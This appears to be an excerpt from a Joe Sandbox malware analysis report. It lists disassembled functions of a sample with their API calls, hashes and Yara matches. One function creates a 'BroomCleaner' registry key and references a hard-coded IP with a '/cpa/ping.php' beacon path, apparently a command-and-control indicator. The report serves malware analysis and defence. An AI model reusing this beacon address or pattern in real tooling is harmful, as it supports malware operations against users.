                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E751B4B1A002459FDB20CFA8D885AEEBBF4FF09310F1541AEE551E7291D730B951CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB1417 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB141C
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB142E
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05BB146B
                                                                                                                                                                                                                                    • Part of subcall function 05BB80E1: _Yarn.LIBCPMT ref: 05BB8100
                                                                                                                                                                                                                                    • Part of subcall function 05BB80E1: _Yarn.LIBCPMT ref: 05BB8124
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 05BB148C
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB149A
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05BB14BD
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB152E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 835844855-0
                                                                                                                                                                                                                                  • Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction ID: 7ab42959e2922bd9d3102909e4dd7abd9a9702abadc79208c78c01772f7ed0fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62315071904B04DFD735AF19D8446AEFBF4FF58610B208AAFE09A92A40C7F4B605CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD6396 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BD639B
                                                                                                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 05BD63C3
                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 05BD6446
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05BD6467
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                  • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                  • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 20e0d18a3fbbcf614562ed2df69df1664f628db786c53828484d37569577b17b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D317A71A00219EFDF159FA8DC94AFEBB79FB48254F04416DE802B3151D7B26D05CB60
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004228D8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F3DC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCF643 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BCF38A: _free.LIBCMT ref: 05BCF3B3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF691
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF69C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF6A7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF6FB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF706
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF711
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF71C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 5fd74a128af271ce6769ea0295eca42b4ab77c9daf396fc07cbd32ed7b74d3b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1112472A40708BADF34BBB0CC49FDB7F9EAF48740F4048DEA69A66050DA69F5044A65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC69A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05BC6BF7,00000001,00000001,?), ref: 05BC6A00
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05BC6BF7,00000001,00000001,?,?,?,?), ref: 05BC6A86
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05BC6B80
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05BC6B8D
                                                                                                                                                                                                                                    • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05BC6B96
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05BC6BBB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                  • Instruction ID: cdbe3e59393565e7d053ea3b5a4f60c6da86ab791faf412beef69446a884c00d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951C072700216ABEB258F68CC46EBB7BAAEF44750F1542EDFD15DA140DB74FC4086A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411A77 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC1CDE Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                  • Instruction ID: bec095b346298e50ef4f3a58bacf30205b5ce342eeaa2781dfdcc58f02d76f12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B51C532A04605ABDB249F6C8C85EBE7FA9EF49361F1042DDE816E6192DB31F501C66C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C9B5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BBCC1C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,05BBCC13,05BBA4C2), ref: 05BBCC2A
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05BBCC38
